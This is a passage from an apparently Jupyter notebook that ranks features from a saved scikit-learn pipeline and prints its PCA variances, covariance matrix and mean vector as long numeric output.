0.00339835666302\n38 acrol0024 0.00339785363518\n39 acrol0039 0.00339773935668\n40 acrol0023 0.00339731398713\n41 acrol0040 0.0033970942003\n42 acrol0022 0.00339664286186\n43 acrol0041 0.00339630493581\n44 acrol0021 0.00339594798976\n45 acrol0042 0.00339541909452\n46 acrol0020 0.00339508366624\n47 acrol0043 0.003394449804\n48 acrol0019 0.00339422193922\n49 acrol0044 0.00339333469331\n50 acrol0018 0.00339331132714\n51 acrol0017 0.0033923844778\n52 acrol0045 0.00339213678646\n53 acrol0016 0.00339145191175\n54 acrol0046 0.00339086292815\n55 acrol0015 0.00339048089589\n56 acrol0014 0.00338946088926\n57 acrol0047 0.00338943214227\n58 acrol0013 0.00338846063886\n59 acrol0048 0.00338796374664\n60 acrol0012 0.0033874741378\n61 acrol0011 0.00338645068003\n62 acrol0049 0.00338637249578\n63 acrol0010 0.00338548139388\n64 acrol0050 0.00338470110041\n65 acrol0009 0.00338450441255\n66 acrol0008 0.0033835589125\n67 acrol0051 0.00338294317041\n68 acrol0007 0.00338259942963\n69 acrol0006 0.00338162777416\n70 acrol0052 0.00338116625971\n71 acrol0005 0.00338072451587\n72 acrol0004 0.00337980966957\n73 acrol0053 0.00337926344988\n74 acrol0003 0.00337892611007\n75 acrol0002 0.00337801551798\n76 acrol0054 0.0033773530283\n77 acrol0001 0.00337711918594\n78 se 0.00337628133105\n79 ssi 0.00337628133105\n80 acrol0000 0.00337628133105\n81 var 0.00337628133105\n82 acrol0055 0.0033753646736\n83 acrol0056 0.00337335037384\n84 acrol0057 0.00337123229495\n85 acrol0058 0.00336904338874\n86 acrol0059 0.00336683858823\n87 acrol0060 0.00336449503489\n88 acrol0061 0.00336216789163\n89 acrol0062 0.00335975362529\n90 acrol0063 0.00335737992064\n91 acrol0064 0.00335487484311\n92 acrol0065 0.00335235007025\n93 acrol0066 0.00334975492777\n94 acrol0067 0.00334718545701\n95 acrol0068 0.00334454413031\n96 acrol0069 0.00334188317042\n97 acrol0070 0.00333925279626\n98 acrol0071 0.00333659329207\n99 acrol0072 0.00333389265225\n100 acrol0073 0.00333115022255\n101 acrol0074 0.00332844142271\n102 acrol0075 0.0033257281867\n103 acrol0076 0.00332300757562\n104 acrol0077 0.00332025757737\n105 acrol0078 0.00331751716552\n106 acrol0079 0.0033147416914\n107 acrol0080 0.00331198657774\n108 acrol0081 0.0033092046539\n109 acrol0082 0.00330640884562\n110 acrol0083 0.00330362061947\n111 acrol0084 0.00330086759701\n112 acrol0085 0.00329801628173\n113 acrol0086 0.00329511541027\n114 acrol0087 0.00329228582721\n115 acrol0088 0.00328937272865\n116 acrol0089 0.00328650235901\n117 acrol0090 0.00328349980116\n118 acrol0091 0.00328050085726\n119 acrol0092 0.00327750205723\n120 acrol0093 0.00327442366333\n121 acrol0094 0.00327134130687\n122 acrol0095 0.00326824757775\n123 acrol0096 0.00326510570231\n124 acrol0097 0.00326198090682\n125 acrol0098 0.00325879531535\n126 acrol0099 0.00325566151283\n127 acrol0100 0.00325247761694\n128 acrol0101 0.00324926223733\n129 acrol0102 0.00324604936978\n130 acrol0103 0.00324280360982\n131 acrol0104 0.00323959940934\n132 acrol0105 0.00323630807866\n133 acrol0106 0.00323303320614\n134 acrol0107 0.00322976883152\n135 acrol0108 0.00322646478929\n136 acrol0109 0.00322323502859\n137 acrol0110 0.00322001007512\n138 acrol0111 0.00321673326776\n139 acrol0112 0.00321357835145\n140 acrol0113 0.00321035439503\n141 acrol0114 0.00320720906884\n142 acrol0115 0.00320409237246\n143 acrol0116 0.00320109640294\n144 acrol0117 0.00319811969749\n145 acrol0118 0.00319523084868\n146 acrol0119 0.00319244085766\n147 acrol0120 0.00318970218864\n148 acrol0121 0.00318707462348\n149 acrol0122 0.00318461959591\n150 acrol0123 0.00318225052029\n151 acrol0171 0.00318036236512\n152 acrol0172 0.00318031896645\n153 acrol0170 0.00318027090269\n154 acrol0173 0.00318018501354\n155 acrol0169 0.00318006473636\n156 acrol0124 0.00317996504254\n157 acrol0174 0.0031799630715\n158 acrol0168 0.00317975626255\n159 acrol0175 0.00317954298357\n160 acrol0167 0.00317940996668\n161 acrol0176 0.00317901739831\n162 acrol0166 0.00317888286614\n163 acrol0177 0.00317838246418\n164 acrol0165 0.00317836498014\n165 acrol0125 0.00317785556424\n166 acrol0164 0.0031777668953\n167 acrol0178 0.00317764800404\n168 acrol0163 0.00317712574209\n169 acrol0179 0.00317668496886\n170 acrol0162 0.00317642302892\n171 acrol0126 0.00317582815273\n172 acrol0180 0.00317570187115\n173 acrol0161 0.00317566860898\n174 acrol0160 0.00317483553278\n175 acrol0181 0.0031746081007\n176 acrol0159 0.00317404057154\n177 acrol0127 0.00317398350265\n178 acrol0182 0.00317337846576\n179 acrol0158 0.00317317216478\n180 acrol0157 0.00317233710683\n181 acrol0128 0.00317220349251\n182 acrol0183 0.00317202163442\n183 acrol0156 0.00317141039729\n184 acrol0129 0.00317057296704\n185 acrol0155 0.00317050246336\n186 acrol0184 0.00317049177988\n187 acrol0154 0.0031695881597\n188 acrol0130 0.00316911244831\n189 acrol0185 0.00316894330036\n190 acrol0153 0.0031686495305\n191 acrol0152 0.00316777317592\n192 acrol0131 0.00316772098472\n193 acrol0186 0.0031672553976\n194 acrol0151 0.00316687550567\n195 acrol0132 0.00316644831852\n196 acrol0150 0.00316596885591\n197 acrol0187 0.00316546929052\n198 acrol0133 0.00316528146392\n199 acrol0149 0.00316513131769\n200 acrol0148 0.00316437747951\n201 acrol0134 0.00316432510959\n202 acrol0147 0.0031636414099\n203 acrol0188 0.00316354111148\n204 acrol0135 0.00316351420327\n205 acrol0146 0.00316298301971\n206 acrol0136 0.00316278329427\n207 acrol0145 0.00316244259434\n208 acrol0137 0.00316221335902\n209 acrol0144 0.00316202299333\n210 acrol0138 0.00316172623487\n211 acrol0143 0.00316163889731\n212 acrol0189 0.00316154598508\n213 acrol0142 0.00316138659466\n214 acrol0139 0.0031613565086\n215 acrol0140 0.00316123647067\n216 acrol0141 0.00316121200102\n217 acrol0190 0.00315943434892\n218 acrol0194 0.00314964298804\n219 acrol0195 0.00314694037402\n220 acrol0196 0.00314401986302\n221 acrol0197 0.00314105488245\n222 acrol0198 0.00313793308538\n223 acrol0199 0.00313476762783\n224 acrol0200 0.00313148739651\n225 acrol0201 0.00312803396944\n226 acrol0202 0.00312444809825\n227 acrol0203 0.00312079671851\n228 acrol0204 0.00311697036119\n229 acrol0205 0.00311304148549\n230 acrol0206 0.00310902873511\n231 acrol0208 0.00310065305243\n232 acrol0209 0.00309628764064\n233 acrol0213 0.00307800474017\n234 acrol0214 0.00307323527626\n235 acrol0215 0.00306841582697\n236 acrol0216 0.00306345857308\n237 acrol0217 0.00305847355468\n238 acrol0218 0.00305341389412\n239 acrol0220 0.00304322103087\n240 acrol0221 0.00303809691734\n241 acrol0223 0.00302758532291\n242 acrol0224 0.00302231603066\n243 acrol0227 0.00300656724293\n244 acrol0228 0.00300135224791\n245 acrol0229 0.00299608620809\n246 acrol0230 0.00299091779968\n247 acrol0231 0.00298572392226\n248 acrol0232 0.00298062501718\n249 acrol0233 0.00297550534133\n250 acrol0234 0.00297047696242\n251 acrol0235 0.00296539794933\n252 acrol0236 0.00296041249555\n253 acrol0237 0.00295554992247\n254 acrol0238 0.00295068783164\n255 acrol0239 0.00294586170353\n256 acrol0240 0.00294116274541\n257 acrol0241 0.00293654168268\n258 acrol0242 0.00293199036896\n259 acrol0243 0.00292740968881\n260 acrol0244 0.00292294756328\n261 acrol0245 0.00291854973241\n262 acrol0246 0.00291418173322\n263 acrol0247 0.00290986080057\n264 acrol0248 0.00290555371274\n265 acrol0249 0.00290141458441\n266 acrol0250 0.00289724182417\n267 acrol0251 0.00289302725413\n268 acrol0252 0.00288887419935\n269 acrol0253 0.00288474527645\n270 acrol0254 0.00288059959492\n271 acrol0255 0.00287649802138\n272 acrol0256 0.00287234815878\n273 acrol0257 0.0028682296794\n274 acrol0258 0.0028640925749\n275 acrol0259 0.00286003940513\n276 acrol0260 0.00285586930717\n277 acrol0261 0.00285162641353\n278 acrol0262 0.00284743609044\n279 acrol0263 0.00284323788204\n280 acrol0264 0.00283908618992\n281 acrol0265 0.00283478759578\n282 acrol0266 0.00283048790098\n283 acrol0267 0.00282610829701\n284 acrol0268 0.0028218418708\n285 acrol0269 0.00281743425906\n286 acrol0270 0.00281304095166\n287 acrol0271 0.00280860463869\n288 acrol0272 0.00280415890364\n289 acrol0273 0.00279961246926\n290 acrol0274 0.00279510879442\n291 acrol0275 0.00279051132366\n292 acrol0276 0.00278594474607\n293 acrol0277 0.00278129288879\n294 acrol0278 0.00277662744558\n295 acrol0279 0.00277191072685\n296 acrol0280 0.00276716851282\n297 acrol0281 0.00276238474118\n298 acrol0282 0.00275759132269\n299 acrol0283 0.00275273773762\n300 acrol0284 0.00274791142243\n301 acrol0285 0.00274301085421\n302 acrol0286 0.00273807423522\n303 acrol0287 0.00273318141075\n304 acrol0288 0.00272828210718\n305 acrol0289 0.00272337662028\n306 acrol0290 0.00271842682674\n307 acrol0291 0.00271352036768\n308 acrol0292 0.00270866672364\n309 acrol0293 0.00270381622681\n310 acrol0294 0.00269887043327\n311 acrol0295 0.00269397867114\n312 acrol0296 0.00268907118885\n313 acrol0297 0.0026842507489\n314 acrol0298 0.00267938455671\n315 acrol0299 0.00267454657876\n316 acrol0300 0.00266969338618\n317 acrol0301 0.00266492549726\n318 acrol0302 0.00266015537081\n319 acrol0303 0.00265534915361\n320 acrol0304 0.0026505797966\n321 acrol0305 0.00264586499601\n322 acrol0306 0.00264110989389\n323 acrol0307 0.00263634554499\n324 acrol0308 0.00263165292856\n325 acrol0309 0.00262682018566\n326 acrol0310 0.00262203559752\n327 acrol0311 0.00261715425485\n328 acrol0312 0.00261232325712\n329 acrol0313 0.00260752122524\n330 acrol0314 0.00260272800843\n331 acrol0315 0.00259798511388\n332 acrol0316 0.00259319358106\n333 acrol0317 0.00258848289349\n334 acrol0318 0.0025838311585\n335 acrol0319 0.00257923320399\n336 acrol0320 0.00257467888338\n337 acrol0321 0.00257017451821\n338 acrol0322 0.0025656610156\n339 acrol0323 0.00256124194049\n340 acrol0324 0.00255688517545\n341 acrol0325 0.00255261523199\n342 acrol0326 0.00254839082721\n343 acrol0327 0.00254426447056\n344 acrol0328 0.00254021580285\n345 acrol0329 0.00253614630599\n346 acrol0330 0.00253218064243\n347 acrol0331 0.00252824853365\n348 acrol0332 0.00252442152595\n349 acrol0333 0.00252059370572\n350 acrol0334 0.00251685883087\n351 acrol0335 0.00251317065344\n352 acrol0336 0.00250953661201\n353 acrol0337 0.00250588240079\n354 acrol0338 0.00250234666933\n355 acrol0339 0.00249885930584\n356 acrol0340 0.00249551828143\n357 acrol0341 0.00249217543461\n358 acrol0342 0.00248884006955\n359 acrol0343 0.00248564783615\n360 acrol0344 0.00248245645485\n361 acrol0345 0.00247935242318\n362 acrol0346 0.00247625574166\n363 acrol0347 0.00247325524385\n364 acrol0348 0.00247036163994\n365 acrol0349 0.00246738003648\n366 acrol0350 0.00246445313882\n367 acrol0351 0.00246157429188\n368 acrol0352 0.00245874198366\n369 acrol0353 0.00245592886533\n370 acrol0354 0.00245313664329\n"
],
[
"r, fs, subfs = 1, 0, 3\nfiln = glob.glob(\"data/results\" + str(r) + \"/fs_\" + str(fs) + \"_subfs_\" + str(subfs) + \"_*.npz\")[0]\nprint filn\nmodel_file = np.load(filn)\nmodel = model_file['model']\n#keep a list of the 1000 features kept\nmodel_feat_scores = model[0].named_steps['feature_selection'].scores_\nmodel_feat_scores = model[0].named_steps['feature_selection'].get_support(indices = True)\nmodel_pca_var = model[0].named_steps['decomp'].explained_variance_\nmodel_pca_var_rat = model[0].named_steps['decomp'].explained_variance_ratio_\nmodel_pca_covar = model[0].named_steps['decomp'].get_covariance()\nmodel_pca_mean = model[0].named_steps['decomp'].mean_\nn_comp = model[0].named_steps['decomp'].n_components_\ncomp = model[0].named_steps['decomp'].components_\nprint len(model_pca_var), model_pca_var\nprint len(model_pca_var_rat), model_pca_var_rat\nprint model_pca_covar.shape, model_pca_covar\n# plt.imshow(model_pca_covar)\nprint len(model_pca_mean), model_pca_mean\nprint n_comp\nprint comp.shape, comp\nnfeat = 1000\nfeat_importance = np.zeros(nfeat)\nfor nc in range(len(comp)):\n feat_importance += comp[nc]*model_pca_var_rat[nc]\n# plt.plot(range(1000),comp[nc]*model_pca_var_rat[nc])\nplt.plot(range(nfeat),feat_importance/nfeat)\nprint feat_importance*nfeat\nsort_feat_imp_ind = np.array(feat_importance).argsort()[:][::-1]\nprint np.array(featnames)[sort_feat_imp_ind]",
"data/results1/fs_0_subfs_3_tr_5_ts_4.npz\n20 [ 635.27304376 278.33611227 30.69938174 6.93535896 2.28809825\n 2.09643049 1.78208177 1.6961141 1.55467524 1.51123534\n 1.3664692 1.30327787 1.21026144 1.15230296 1.13857686\n 1.09402407 1.07557543 1.0462369 0.99788984 0.99201795]\n20 [ 0.63527304 0.27833611 0.03069938 0.00693536 0.0022881 0.00209643\n 0.00178208 0.00169611 0.00155468 0.00151124 0.00136647 0.00130328\n 0.00121026 0.0011523 0.00113858 0.00109402 0.00107558 0.00104624\n 0.00099789 0.00099202]\n(1000, 1000) [[ 27.37368911 0.92285356 0.0595558 ..., 0.12837082 0.12743588\n 0.21891365]\n [ 0.92285356 27.37368911 0.0595558 ..., 0.12837082 0.12743588\n 0.21891365]\n [ 0.0595558 0.0595558 27.24602051 ..., 0.79672983 0.79658456\n 0.68288268]\n ..., \n [ 0.12837082 0.12837082 0.79672983 ..., 27.29621694 0.84533024\n 0.7324894 ]\n [ 0.12743588 0.12743588 0.79658456 ..., 0.84533024 27.29611624\n 0.73233508]\n [ 0.21891365 0.21891365 0.68288268 ..., 0.7324894 0.73233508\n 27.09834563]]\n1000 [ -1.74010466e-15 -1.74010466e-15 2.29597143e-17 1.26640950e-15\n -4.08924595e-15 1.93344962e-16 -1.00539380e-15 0.00000000e+00\n -1.74010466e-15 1.20840601e-18 -4.83362405e-18 -2.41681203e-17\n -1.57092782e-17 -1.02714511e-17 0.00000000e+00 1.20840601e-18\n 3.62521804e-18 -3.14185563e-17 1.32924661e-17 3.62521804e-17\n 1.20840601e-17 4.59194285e-17 9.30472630e-17 -1.81260902e-18\n -4.83362405e-17 6.04203007e-19 -4.28984135e-17 2.53765263e-17\n -3.62521804e-18 1.38966692e-17 -3.62521804e-18 -1.32924661e-17\n 1.20840601e-17 -2.41681203e-17 1.69176842e-17 4.22942105e-18\n -7.73379848e-17 1.02714511e-17 1.20840601e-17 2.65849323e-17\n 6.82749397e-17 -1.46217128e-16 -7.25043608e-18 -2.36847579e-16\n 1.35341473e-16 6.64623307e-18 -4.83362405e-17 -1.02714511e-17\n 1.64343218e-16 4.83362405e-18 -1.26278428e-16 4.10858044e-17\n 2.15096270e-16 4.83362405e-17 -1.00297699e-16 4.47110225e-17\n 3.14185563e-17 -1.49842346e-16 1.42591910e-16 7.00875488e-17\n 4.10858044e-17 1.57092782e-17 2.05429022e-17 4.95446465e-17\n -4.83362405e-18 6.28371127e-17 5.55866766e-17 -2.90017443e-17\n 1.00297699e-16 -7.49211728e-17 -1.35341473e-16 1.81260902e-17\n 6.88791428e-17 8.94220450e-17 6.04203007e-17 -3.74605864e-17\n -1.34133067e-16 -1.37758286e-16 -9.54640750e-17 7.25043608e-18\n -7.73379848e-17 -2.17513082e-17 2.53765263e-17 -3.86689924e-17\n 1.66760030e-16 8.09632029e-17 -1.24465819e-16 1.06339729e-16\n -1.47425534e-16 2.05429022e-17 1.57092782e-16 -6.04203007e-18\n -1.47425534e-16 1.99386992e-16 1.64343218e-16 -2.47723233e-16\n 2.13887864e-16 1.36549879e-16 -9.54640750e-17 2.05429022e-17\n 1.02714511e-16 -8.70052330e-17 -2.41681203e-18 -3.74605864e-17\n 6.76707367e-17 -1.20840601e-18 -6.28371127e-17 -9.54640750e-17\n 5.92118946e-17 -9.42556690e-17 5.19614586e-17 4.35026165e-17\n 0.00000000e+00 -1.07548135e-16 -1.29299443e-16 8.57968269e-17\n -1.28091037e-16 -1.37758286e-16 3.62521804e-17 -9.42556690e-17\n 3.62521804e-17 4.95446465e-17 -1.22049007e-16 3.74605864e-17\n -7.61295788e-17 -3.86689924e-17 -8.45884209e-18 -1.01506105e-16\n 2.48931639e-16 -7.49211728e-17 2.06637428e-16 2.77933383e-17\n -6.04203007e-18 -5.43782706e-17 4.59194285e-17 -1.31716255e-16\n -1.12381759e-16 -1.37758286e-16 2.21138300e-16 -2.29597143e-17\n -2.50140045e-16 1.86094526e-16 1.06339729e-16 2.06637428e-16\n -1.17215383e-16 1.83677714e-16 1.36549879e-16 1.16006977e-16\n 1.29299443e-16 -1.28091037e-16 -4.22942105e-17 -2.41681203e-18\n 1.26882631e-16 -8.94220450e-17 8.21716089e-17 -6.04203007e-17\n -6.52539247e-17 -1.01506105e-16 1.77635684e-16 -4.83362405e-18\n -1.54675970e-16 -7.12959548e-17 -7.25043608e-18 1.16006977e-16\n 2.35639173e-16 1.31716255e-16 -3.26269624e-17 -5.67950826e-17\n -1.05131323e-16 -1.52259158e-16 1.13590165e-16 2.22346706e-16\n -4.59194285e-17 -1.06339729e-16 1.93344962e-16 -1.74010466e-15\n 2.90017443e-17 -1.00539380e-15 1.26640950e-15 -7.73379848e-17\n -1.30507849e-16 4.83362405e-18 -1.39208373e-15 -3.86689924e-17\n -7.34710856e-16 1.16006977e-16 1.97211861e-15 -9.28055818e-16\n -9.66724811e-16 -2.32013955e-16 6.57372871e-16 2.08812559e-15\n -6.96041864e-16 3.98290622e-15 -1.31474574e-15 -3.48020932e-16\n -3.09351939e-16 -6.18703879e-16 -2.32013955e-16 -2.47481552e-15\n -2.01078761e-15 2.78416745e-15 -1.12140078e-15 -3.67355428e-15\n -4.25358917e-16 7.73379848e-17 -1.54675970e-15 -2.04945660e-15\n 1.54675970e-16 1.16006977e-16 1.97211861e-15 -1.43075272e-15\n 3.67355428e-15 -2.70682947e-16 7.73379848e-17 2.04945660e-15\n -8.12048841e-16 5.02696901e-16 1.58542869e-15 -3.86689924e-16\n 1.27607675e-15 -4.64027909e-16 -5.80034886e-16 3.17085738e-15\n 1.12140078e-15 -4.64027909e-16 3.90556823e-15 -3.09351939e-15\n -2.32013955e-15 -1.00539380e-15 -5.41365894e-16 -1.85611164e-15\n 2.20413257e-15 1.27607675e-15 -7.73379848e-16 -1.12140078e-15\n 2.62949148e-15 -1.43075272e-15 1.08273179e-15 3.01618141e-15\n 2.62949148e-15 -1.93344962e-15 1.70143567e-15 9.66724811e-16\n -2.35880854e-15 6.57372871e-16 1.81744264e-15 3.09351939e-16\n 2.12679458e-15 -3.20952637e-15 1.12140078e-15 6.57372871e-16\n 9.66724811e-16 -1.23740776e-15 2.90017443e-15 1.23740776e-15\n -2.66816048e-15 -5.41365894e-16 -1.19873877e-15 3.05485040e-15\n -2.32013955e-16 -1.12140078e-15 2.24280156e-15 1.77877365e-15\n 6.18703879e-16 8.50717833e-16 -3.86689924e-16 -3.32553335e-15\n 1.54675970e-16 -8.89386826e-16 1.46942171e-15 2.35880854e-15\n -1.93344962e-16 -1.35341473e-15 4.25358917e-15 -3.09351939e-16\n -5.80034886e-16 -8.50717833e-16 -3.86689924e-17 -1.62409768e-15\n -5.02696901e-16 -7.34710856e-16 2.08812559e-15 1.58542869e-15\n -2.70682947e-15 3.09351939e-16 2.55215350e-15 -7.34710856e-16\n -1.85611164e-15 -1.93344962e-16 -1.46942171e-15 -3.48020932e-16\n -2.12679458e-15 1.89478063e-15 -1.89478063e-15 -5.41365894e-16\n 7.34710856e-16 7.73379848e-16 -3.01618141e-15 -2.78416745e-15\n -1.23740776e-15 -9.28055818e-16 -5.02696901e-16 -2.70682947e-16\n -1.54675970e-16 2.08812559e-15 -2.28147055e-15 -8.12048841e-16\n -1.85611164e-15 -8.50717833e-16 -8.50717833e-16 6.96041864e-16\n -1.27607675e-15 3.20952637e-15 5.02696901e-16 5.80034886e-16\n 6.18703879e-16 -1.85611164e-15 8.12048841e-16 -8.50717833e-16\n 1.54675970e-16 1.54675970e-15 -1.39208373e-15 1.19873877e-15\n -1.54675970e-15 2.16546358e-15 3.09351939e-16 -5.02696901e-16\n -1.62409768e-15 2.32013955e-16 -2.12679458e-15 1.46942171e-15\n -1.12140078e-15 9.66724811e-16 4.25358917e-16 0.00000000e+00\n 3.48020932e-16 -4.64027909e-16 -1.16006977e-16 1.12140078e-15\n -1.16006977e-15 0.00000000e+00 -8.50717833e-16 -1.58542869e-15\n 7.73379848e-16 -1.74010466e-15 -3.28686436e-15 -1.35341473e-15\n 5.02696901e-16 -1.54675970e-16 -2.51348451e-15 -9.66724811e-16\n 1.46942171e-15 5.02696901e-16 -3.09351939e-16 1.46942171e-15\n 2.04945660e-15 -1.08273179e-15 -5.02696901e-16 6.57372871e-16\n -1.70143567e-15 1.19873877e-15 1.66276667e-15 1.12140078e-15\n -2.62949148e-15 -1.93344962e-16 2.70682947e-16 1.12140078e-15\n -2.32013955e-15 1.27607675e-15 1.85611164e-15 1.04406280e-15\n -1.00539380e-15 8.89386826e-16 1.54675970e-16 1.04406280e-15\n -6.18703879e-16 -3.48020932e-16 -3.09351939e-15 -1.19873877e-15\n 1.12140078e-15 -2.62949148e-15 9.66724811e-16 -2.04945660e-15\n -2.43614652e-15 3.09351939e-16 1.97211861e-15 3.09351939e-16\n -9.66724811e-16 -1.54675970e-16 6.18703879e-16 -1.46942171e-15\n -8.50717833e-16 -1.27607675e-15 5.22031398e-15 1.08273179e-15\n 8.12048841e-16 -1.93344962e-15 3.86689924e-17 -1.54675970e-15\n 2.20413257e-15 -2.32013955e-16 1.27607675e-15 9.66724811e-16\n 2.90017443e-15 -9.66724811e-16 -1.16006977e-16 -6.96041864e-16\n 1.97211861e-15 2.51348451e-15 1.16006977e-16 -1.97211861e-15\n -8.50717833e-16 8.12048841e-16 -1.46942171e-15 -4.25358917e-16\n -1.31474574e-15 -7.73379848e-17 1.74010466e-15 9.28055818e-16\n 1.23740776e-15 -1.08273179e-15 2.70682947e-16 -2.16546358e-15\n 1.54675970e-16 -1.16006977e-16 1.66276667e-15 -8.12048841e-16\n -1.93344962e-15 6.96041864e-16 7.34710856e-16 -1.00539380e-15\n -7.73379848e-16 -1.62409768e-15 -6.96041864e-16 -2.90017443e-15\n 7.73379848e-17 -3.48020932e-16 1.16006977e-16 -7.34710856e-16\n 5.41365894e-16 -2.32013955e-16 5.02696901e-16 -1.08273179e-15\n 1.97211861e-15 8.12048841e-16 -1.35341473e-15 -1.58542869e-15\n -8.50717833e-16 -1.04406280e-15 -2.12679458e-15 4.64027909e-16\n -1.00539380e-15 1.62409768e-15 1.19873877e-15 3.09351939e-16\n 1.85611164e-15 4.64027909e-16 2.12679458e-15 5.02696901e-16\n 1.93344962e-16 1.23740776e-15 1.54675970e-16 -3.48020932e-16\n -1.97211861e-15 0.00000000e+00 4.64027909e-16 1.19873877e-15\n -2.43614652e-15 -8.89386826e-16 -3.48020932e-16 1.16006977e-16\n -6.57372871e-16 8.12048841e-16 -3.48020932e-16 1.54675970e-16\n 1.54675970e-15 1.19873877e-15 1.08273179e-15 7.73379848e-17\n -4.25358917e-16 5.41365894e-16 -2.43614652e-15 -1.43075272e-15\n -3.13218839e-15 -9.28055818e-16 -1.66276667e-15 -1.81744264e-15\n -1.77877365e-15 1.31474574e-15 -1.97211861e-15 5.02696901e-16\n 3.63488529e-15 -4.25358917e-16 2.08812559e-15 -8.89386826e-16\n 1.39208373e-15 2.08812559e-15 2.39747753e-15 -4.25358917e-16\n 3.51887831e-15 3.51887831e-15 7.34710856e-16 1.27607675e-15\n 5.41365894e-16 -7.73379848e-17 -1.08273179e-15 -1.46942171e-15\n 2.32013955e-16 -8.50717833e-16 -2.20413257e-15 7.73379848e-16\n 1.04406280e-15 2.24280156e-15 -1.62409768e-15 3.09351939e-15\n 3.24819536e-15 -9.28055818e-16 -1.77877365e-15 -1.12140078e-15\n 8.50717833e-16 -1.54675970e-15 -1.08273179e-15 6.18703879e-16\n -2.16546358e-15 0.00000000e+00 7.73379848e-17 2.35880854e-15\n -3.32553335e-15 -3.09351939e-16 3.86689924e-17 1.74010466e-15\n 1.16006977e-15 -6.57372871e-16 1.12140078e-15 1.00539380e-15\n -8.89386826e-16 1.89478063e-15 6.57372871e-16 1.97211861e-15\n 1.31474574e-15 6.18703879e-16 -2.20413257e-15 2.78416745e-15\n -1.58542869e-15 2.16546358e-15 1.46942171e-15 1.23740776e-15\n -3.09351939e-16 -4.25358917e-16 2.20413257e-15 -1.08273179e-15\n 1.35341473e-15 1.54675970e-15 -6.18703879e-16 8.12048841e-16\n 4.64027909e-16 -1.16006977e-15 1.16006977e-16 -3.09351939e-16\n -3.17085738e-15 2.04945660e-15 -3.20952637e-15 -4.25358917e-16\n 1.66276667e-15 -5.02696901e-16 1.54675970e-16 -1.66276667e-15\n -1.93344962e-15 3.09351939e-16 8.12048841e-16 5.02696901e-16\n -1.23740776e-15 -6.57372871e-16 2.08812559e-15 -1.04406280e-15\n 1.35341473e-15 1.16006977e-16 6.96041864e-16 -1.16006977e-15\n -1.27607675e-15 1.85611164e-15 6.96041864e-16 1.31474574e-15\n 1.12140078e-15 -8.89386826e-16 -2.86150544e-15 2.70682947e-16\n -1.12140078e-15 -8.89386826e-16 -2.55215350e-15 -1.62409768e-15\n 3.01618141e-15 3.28686436e-15 -1.81744264e-15 2.32013955e-15\n -7.73379848e-16 1.97211861e-15 0.00000000e+00 1.93344962e-15\n 9.28055818e-16 4.25358917e-16 1.39208373e-15 2.35880854e-15\n 5.80034886e-16 -1.54675970e-15 -1.16006977e-16 -2.04945660e-15\n -1.54675970e-15 7.73379848e-17 7.34710856e-16 -7.73379848e-16\n -3.86689924e-16 1.43075272e-15 1.23740776e-15 -2.20413257e-15\n -2.55215350e-15 -3.48020932e-16 -3.86689924e-16 -3.09351939e-16\n -1.54675970e-16 -1.58542869e-15 1.00539380e-15 2.78416745e-15\n -1.54675970e-16 2.12679458e-15 2.51348451e-15 8.89386826e-16\n 3.36420234e-15 -2.39747753e-15 2.74549846e-15 2.59082249e-15\n -1.08273179e-15 3.09351939e-16 -3.86689924e-17 -1.74010466e-15\n 3.09351939e-16 7.73379848e-17 -3.13218839e-15 2.62949148e-15\n -8.50717833e-16 1.35341473e-15 3.17085738e-15 -4.09891320e-15\n -5.41365894e-16 -7.73379848e-17 4.64027909e-16 5.41365894e-16\n 3.67355428e-15 2.86150544e-15 5.02696901e-16 -7.34710856e-16\n 1.77877365e-15 -1.12140078e-15 5.41365894e-16 1.00539380e-15\n -1.31474574e-15 -1.00539380e-15 -3.86689924e-17 1.74010466e-15\n 2.20413257e-15 7.73379848e-16 1.23740776e-15 -4.25358917e-16\n -1.31474574e-15 1.08273179e-15 -6.57372871e-16 8.12048841e-16\n 7.73379848e-16 -2.16546358e-15 -2.70682947e-16 -5.41365894e-16\n -1.04406280e-15 -1.00539380e-15 5.80034886e-16 7.73379848e-17\n 3.24819536e-15 8.89386826e-16 1.31474574e-15 -6.96041864e-16\n 3.20952637e-15 -3.48020932e-16 -3.51887831e-15 -8.12048841e-16\n -4.64027909e-16 -2.66816048e-15 -2.66816048e-15 0.00000000e+00\n 6.18703879e-16 3.48020932e-16 1.62409768e-15 9.66724811e-16\n -3.09351939e-16 -1.46942171e-15 7.73379848e-17 1.77877365e-15\n -1.54675970e-16 1.54675970e-16 7.73379848e-16 2.66816048e-15\n 5.41365894e-16 -5.80034886e-16 -8.89386826e-16 1.46942171e-15\n 5.80034886e-16 1.54675970e-16 5.02696901e-16 -6.18703879e-16\n 1.66276667e-15 2.32013955e-16 -1.89478063e-15 3.86689924e-16\n -1.27607675e-15 1.66276667e-15 -7.34710856e-16 1.31474574e-15\n -3.86689924e-17 9.66724811e-16 8.12048841e-16 1.93344962e-15\n -2.43614652e-15 2.32013955e-16 1.85611164e-15 -9.28055818e-16\n 2.78416745e-15 1.08273179e-15 -1.31474574e-15 -1.16006977e-16\n -4.25358917e-16 6.18703879e-16 -3.48020932e-16 6.57372871e-16\n -2.70682947e-16 -2.47481552e-15 -7.73379848e-17 1.39208373e-15\n -1.46942171e-15 1.54675970e-15 4.25358917e-16 5.80034886e-16\n -3.48020932e-16 2.20413257e-15 8.50717833e-16 1.43075272e-15\n 0.00000000e+00 1.00539380e-15 -1.27607675e-15 -1.62409768e-15\n 2.90017443e-15 -1.43075272e-15 -5.41365894e-16 -1.39208373e-15\n -1.74010466e-15 -1.00539380e-15 1.19873877e-15 2.70682947e-16\n -2.08812559e-15 -1.66276667e-15 1.35341473e-15 1.43075272e-15\n 1.31474574e-15 2.47481552e-15 5.80034886e-16 -1.77877365e-15\n -3.67355428e-15 -1.81744264e-15 -1.23740776e-15 -4.06024420e-15\n -2.04945660e-15 -2.12679458e-15 -6.57372871e-16 -7.73379848e-16\n -3.86689924e-16 1.27607675e-15 1.23740776e-15 -1.93344962e-16\n 1.35341473e-15 3.86689924e-17 -1.31474574e-15 -6.57372871e-16\n 1.89478063e-15 2.86150544e-15 -7.73379848e-17 2.32013955e-16\n -1.19873877e-15 1.16006977e-16 -3.13218839e-15 1.74010466e-15\n -1.70143567e-15 8.50717833e-16 2.93884342e-15 -2.24280156e-15\n -1.54675970e-16 -1.08273179e-15 3.86689924e-16 2.70682947e-16\n -1.70143567e-15 3.86689924e-16 -1.74010466e-15 -8.21716089e-17\n 2.22346706e-16 9.90892931e-16 5.70367638e-16 1.21807326e-15\n -5.89702134e-16 1.74010466e-16 -1.16973702e-15 7.73379848e-17\n -4.20525293e-16 -4.44693413e-16 5.80034886e-17 5.05113714e-16\n 6.13870255e-16 